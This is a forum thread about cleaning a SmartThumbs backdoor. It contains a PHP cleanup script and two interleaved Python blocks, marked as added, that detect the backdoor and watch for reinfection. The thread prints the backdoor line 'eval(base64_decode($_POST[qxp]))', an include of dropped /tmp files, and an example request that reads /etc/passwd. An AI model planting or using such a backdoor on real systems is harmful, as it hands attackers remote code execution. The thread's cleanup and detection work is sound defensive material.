removing ST exploit

  • MMarko
    Confirmed User
    • Jun 2007
    • 160

    #1

    removing ST exploit

    I wrote a simple tutorial on how to remove the ST exploit and check if you're affected by it... because it looks like many ST installs are still infected and not cleaned. I think the update will not clean it... you have to do it manually...

    Remove SmartThumbs exploit in 5 steps
    dlXer - web design, developing, managed hosting, website optimizations
  • boneless
    Confirmed User
    • Dec 2002
    • 3625

    #2
    I read it and have a small question:

    It says if you've got the include line and the base64 line then you're still infected.

    I only have this one:
    @eval(base64_decode($_POST[qxp]));//';

    Does that mean I'm not infected, or still infected?
    icq:148573096 skype:dabone2 email:boneless(a)mgpteam(.)com

    • boneless
      Confirmed User
      • Dec 2002
      • 3625

      #3
      Damn, just found the other line as well, except it isn't including sesa.tmp but webcam.tmp.

      Should I show the post you made to my sysadmin and have them take care of it? Or do it myself, as I don't have access to phpMyAdmin. My host normally does that type of stuff.

      Is there any other way besides phpMyAdmin to do this?
      icq:148573096 skype:dabone2 email:boneless(a)mgpteam(.)com

      • MMarko
        Confirmed User
        • Jun 2007
        • 160

        #4
        You're infected for sure.

        Well... you need something which will allow you to edit entries in MySQL tables... so phpMyAdmin or anything else capable of editing table values.
        dlXer - web design, developing, managed hosting, website optimizations

        • k0nr4d
          Confirmed User
          • Aug 2006
          • 9231

          #5
          Untested (might not work at all. I don't have ST, and I just wrote it based on the instructions in the blog post). I take no responsibility if it breaks something; use at your own risk.

          PHP Code:
          <?php
          // Connection details for the ST database (fill these in).
          $dbserver = '';
          $dbuser = '';
          $dbpass = '';
          $dbname = '';
          $dblink = mysql_connect($dbserver, $dbuser, $dbpass);
          mysql_select_db($dbname, $dblink);

          // Keep a copy of the infected file before editing it.
          copy("st/admin/variables.php", "tmp/variables.bak");
          $string = file_get_contents("st/admin/variables.php");
          // Single-quoted so $_POST[qxp] is matched literally rather than interpolated.
          $string = str_replace('@eval(base64_decode($_POST[qxp]));//\';', '', $string);
          file_put_contents("st/admin/variables.php", $string);
          // Remove the dropped files that the injected include line loads.
          unlink("/tmp/sesa.tmp");
          unlink("/tmp/webcam.tmp");
          // Reload the cleaned file so $niche is defined for the update below.
          include('st/admin/variables.php');
          $niche = mysql_real_escape_string($niche, $dblink);
          mysql_query("UPDATE st_settings SET niche = '$niche'");
          exit("Done");
          ?>
          Last edited by k0nr4d; 05-08-2010, 07:23 AM.
          Mechanical Bunny Media
          Mechbunny Tube Script | Mechbunny Webcam Aggregator Script | Custom Web Development

          • grumpy
            Too lazy to set a custom title
            • Jan 2002
            • 9870

            #6
            Originally posted by k0nr4d
            Untested (might not work at all. I don't have ST, and I just wrote it based on the instructions in the blog post). I take no responsibility if it breaks something; use at your own risk.
            [...]
            mysql_query("UPDATE st_settings SET niche = '$niche'");

            $niche is undefined
            Don't let greediness blur your vision | You gotta let some shit slide
            icq - 441-456-888

            • k0nr4d
              Confirmed User
              • Aug 2006
              • 9231

              #7
              Originally posted by grumpy
              $niche is undefined
              Sure it is, it's including the variables.php file before inserting it.
              Mechanical Bunny Media
              Mechbunny Tube Script | Mechbunny Webcam Aggregator Script | Custom Web Development

              • PXN
                Confirmed User
                • Jun 2008
                • 1548

                #8
                nice stuff. Thanks for sharing.

                • MMarko
                  Confirmed User
                  • Jun 2007
                  • 160

                  #9
                  Code:
                  $dbserver = '';
                  $dbuser = ''; 
                  $dbpass = ''; 
                  $dbname = '';
                  You should include st/classes/mysql.php before that... and remove those lines completely...

                  However, I'd suggest that you manually take a look at those files so you double-check everything and avoid any major fuckup...
                  Last edited by MMarko; 05-08-2010, 03:52 PM.
                  dlXer - web design, developing, managed hosting, website optimizations
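An added example, not from the thread, the blog post, or the SmartThumbs code, that does the manual check from posts #1 to #3 and the file cleanup from posts #5 and #9 in one script: it scans a variables.php for the two indicators named above (an include of a /tmp/*.tmp file such as sesa.tmp or webcam.tmp, and an eval of a base64-decoded request parameter), strips only those fragments so legitimate code on the same line survives, and keeps a timestamped backup. The regexes deliberately go beyond the page: any *.tmp name and any parameter name in $_POST/$_GET/$_REQUEST/$_COOKIE are matched, not just qxp. The sample file contents are constructed here, and the database step (st/classes/mysql.php, the st_settings niche column) is not part of this script, so the settings table still has to be checked separately as the posts say.

```python
import os
import re
import shutil
import tempfile
import time

# Indicator 1, the "include line" from the posts: include/require of a dropped
# file under /tmp. The thread names sesa.tmp and webcam.tmp; any *.tmp matches.
INCLUDE_FRAGMENT = re.compile(
    r"""@?(?:include|require)(?:_once)?\s*\(?\s*['"]/tmp/[^'"]+\.tmp['"]\s*\)?\s*;"""
)
# Indicator 2, the "base64 line": eval of a base64-decoded request parameter.
# The page shows $_POST[qxp]; the parameter name and superglobal are left open.
# The optional trailing //'; is the comment the injection appends to swallow the
# rest of the original line, so it is removed together with the eval call.
EVAL_FRAGMENT = re.compile(
    r"""@?eval\s*\(\s*base64_decode\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\s*"""
    r"""\[\s*['"]?\w+['"]?\s*\]\s*\)\s*\)\s*;(?://'\s*;)?"""
)
INDICATORS = (("include-tmp", INCLUDE_FRAGMENT), ("eval-post", EVAL_FRAGMENT))

# Constructed sample of an infected st/admin/variables.php, not a real file.
SAMPLE_VARIABLES_PHP = """<?php
// constructed sample of an infected variables.php
$site_name = 'Example Tube';
@include('/tmp/webcam.tmp');
$niche = '';@eval(base64_decode($_POST[qxp]));//';
$per_page = 20;
?>
"""


def scan_text(source):
    """Return one {line, kind, match} entry per injected fragment found."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for kind, pattern in INDICATORS:
            found = pattern.search(line)
            if found:
                hits.append({"line": lineno, "kind": kind, "match": found.group(0)})
    return hits


def clean_text(source):
    """Strip only the injected fragments, keeping legitimate code that shares the
    line. Lines left empty by the removal are dropped. Returns (text, removed)."""
    out, removed = [], 0
    for line in source.splitlines(keepends=True):
        new = line
        for _kind, pattern in INDICATORS:
            new, count = pattern.subn("", new)
            removed += count
        if new != line and not new.strip():
            continue  # the line was nothing but the injection
        out.append(new)
    return "".join(out), removed


def clean_file(path, backup_dir):
    """Back up `path` into `backup_dir` (timestamped), then rewrite it cleaned.
    Returns a report; the file is left untouched when nothing is found."""
    with open(path, encoding="utf-8", errors="surrogateescape") as fh:
        original = fh.read()
    if not scan_text(original):
        return {"path": path, "backup": None, "removed": 0, "remaining": []}
    os.makedirs(backup_dir, exist_ok=True)
    backup = os.path.join(backup_dir, "%s.%d.bak" % (os.path.basename(path), int(time.time())))
    shutil.copy2(path, backup)
    cleaned, removed = clean_text(original)
    with open(path, "w", encoding="utf-8", errors="surrogateescape") as fh:
        fh.write(cleaned)
    return {"path": path, "backup": backup, "removed": removed,
            "remaining": scan_text(cleaned)}


def demo_clean_in_tempdir():
    """Run the cleaner against the constructed sample in a scratch directory."""
    root = tempfile.mkdtemp(prefix="st-clean-")
    target = os.path.join(root, "variables.php")
    with open(target, "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_VARIABLES_PHP)
    report = clean_file(target, os.path.join(root, "backup"))
    with open(target, encoding="utf-8") as fh:
        report["cleaned_text"] = fh.read()
    with open(report["backup"], encoding="utf-8") as fh:
        report["backup_intact"] = fh.read() == SAMPLE_VARIABLES_PHP
    shutil.rmtree(root)
    return report


if __name__ == "__main__":
    for hit in scan_text(SAMPLE_VARIABLES_PHP):
        print("line %3d %-12s %s" % (hit["line"], hit["kind"], hit["match"]))
    print(demo_clean_in_tempdir())
```

Run scan_text over a copy of your own variables.php first and read every match before letting clean_file touch the live file; the backup directory you pass should sit outside the web root, because a .bak containing the backdoor that is still served as text is a leak of its own.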

                  • rowan
                    Too lazy to set a custom title
                    • Mar 2002
                    • 17393

                    #10
                    Originally posted by boneless
                    I read it and have a small question:

                    It says if you've got the include line and the base64 line then you're still infected.

                    I only have this one:
                    @eval(base64_decode($_POST[qxp]));//';

                    Does that mean I'm not infected, or still infected?
                    FYI, that little bit of code executes whatever is passed in the variable 'qxp'.

                    So they could post something like qxp=cat%20/etc/passwd (display the contents of the password file).

                    • Davy
                      Confirmed User
                      • Apr 2006
                      • 4323

                      #11
                      Originally posted by boneless
                      @eval(base64_decode($_POST[qxp]));
                      Holy shit. Who in the right state of mind would add such a code to their product? Yikes!
                      ---
                      ICQ 14-76-98 <-- I don't use this at all

                      • CyberHustler
                        Masterbaiter
                        • Feb 2006
                        • 28735

                        #12
                        “If you can convince the lowest white man he’s better than the best colored man, he won’t notice you’re picking his pocket. Hell, give him somebody to look down on, and he’ll empty his pockets for you.”

                        • LoveSandra
                          So Fucking Banned
                          • Aug 2008
                          • 10551

                          #13
                          wtf.......................

                          • nation-x
                            Confirmed User
                            • Mar 2004
                            • 5370

                            #14
                            Originally posted by Davy
                            Holy shit. Who in the right state of mind would add such a code to their product? Yikes!
                            uuuuuhhhhh wut??

                            • Davy
                              Confirmed User
                              • Apr 2006
                              • 4323

                              #15
                              Originally posted by nation-x
                              uuuuuhhhhh wut??
                              This thread is about a security exploit. I thought the info above was the security hole.
                              ---
                              ICQ 14-76-98 <-- I don't use this at all

                              • u-Bob
                                there's no $$$ in porn
                                • Jul 2005
                                • 33063

                                #16
                                If your box was compromised, there's only one thing to do: reinstall everything.

                                • MMarko
                                  Confirmed User
                                  • Jun 2007
                                  • 160

                                  #17
                                  lol, yes, and for every WordPress exploit everyone should reinstall the whole box :D

                                  Don't be silly.
                                  dlXer - web design, developing, managed hosting, website optimizations

                                  • u-Bob
                                    there's no $$$ in porn
                                    • Jul 2005
                                    • 33063

                                    #18
                                    Originally posted by MMarko
                                    lol, yes, and for every WordPress exploit everyone should reinstall the whole box :D
                                    Simple answer: yes.

                                    • Shoplifter
                                      Richest man in Babylon
                                      • Jan 2002
                                      • 5845

                                      #19
                                      Bumping this to the top. I think this exploit is not getting the attention it deserves.

                                      We cleaned a number of sites and in some cases the exploit was back in 3 hours.
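Shoplifter's report that the exploit came back within hours is the case for a baseline check rather than a one-off cleanup. An added example, not part of the thread or of SmartThumbs: hash the PHP files of the install once after cleaning, store the hashes outside the web root, and re-run the comparison to list files that were added, modified or removed since. The site layout, file names and the simulated reinfection below are constructed for the demonstration. It tells you that the site changed, not how the attacker got back in, so it sits alongside the patch or reinstall debated above rather than replacing either.

```python
import hashlib
import json
import os
import shutil
import tempfile


def _is_code(name):
    """Files worth baselining on a PHP site: scripts, includes and .htaccess."""
    return name.endswith((".php", ".inc")) or name == ".htaccess"


def hash_tree(root):
    """Map relative path -> SHA-256 for every code file under `root`."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not _is_code(name):
                continue
            full = os.path.join(dirpath, name)
            digest = hashlib.sha256()
            with open(full, "rb") as fh:
                for chunk in iter(lambda: fh.read(1 << 16), b""):
                    digest.update(chunk)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            digests[rel] = digest.hexdigest()
    return digests


def save_baseline(root, baseline_path):
    """Write the current hashes; keep this file outside the web root."""
    with open(baseline_path, "w") as fh:
        json.dump(hash_tree(root), fh, indent=1, sort_keys=True)


def check_against_baseline(root, baseline_path):
    """Sorted lists of files added, modified or removed since the baseline."""
    with open(baseline_path) as fh:
        old = json.load(fh)
    new = hash_tree(root)
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "modified": sorted(p for p in set(old) & set(new) if old[p] != new[p]),
    }


def demo_reinfection_check():
    """Constructed scenario: baseline a clean tree, then simulate the exploit
    coming back (variables.php edited, a new script dropped) and re-check."""
    root = tempfile.mkdtemp(prefix="st-site-")
    store = tempfile.mkdtemp(prefix="st-baseline-")  # outside the web tree
    admin = os.path.join(root, "admin")
    os.makedirs(admin)
    variables = os.path.join(admin, "variables.php")
    with open(variables, "w") as fh:
        fh.write("<?php\n$niche = '';\n?>\n")
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php echo 'ok'; ?>\n")
    with open(os.path.join(root, "logo.png"), "wb") as fh:
        fh.write(b"\x89PNG constructed, ignored by the filter")
    baseline = os.path.join(store, "baseline.json")
    save_baseline(root, baseline)
    first = check_against_baseline(root, baseline)
    # Simulate the reinfection the thread describes.
    with open(variables, "a") as fh:
        fh.write("@eval(base64_decode($_POST[qxp]));//';\n")
    with open(os.path.join(admin, "dropped.php"), "w") as fh:
        fh.write("<?php /* constructed: attacker-dropped file */ ?>\n")
    after = check_against_baseline(root, baseline)
    shutil.rmtree(root)
    shutil.rmtree(store)
    return {"first": first, "after": after}


if __name__ == "__main__":
    print(json.dumps(demo_reinfection_check(), indent=1))
```

Run save_baseline right after a cleanup you have verified by hand, then schedule check_against_baseline from cron; a non-empty "modified" or "added" list on an install nobody has updated is the three-hour reinfection showing up as a file change rather than as a complaint from a visitor.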

                                      • Tulku
                                        Confirmed User
                                        • Aug 2003
                                        • 672

                                        #20
                                        Bumping...
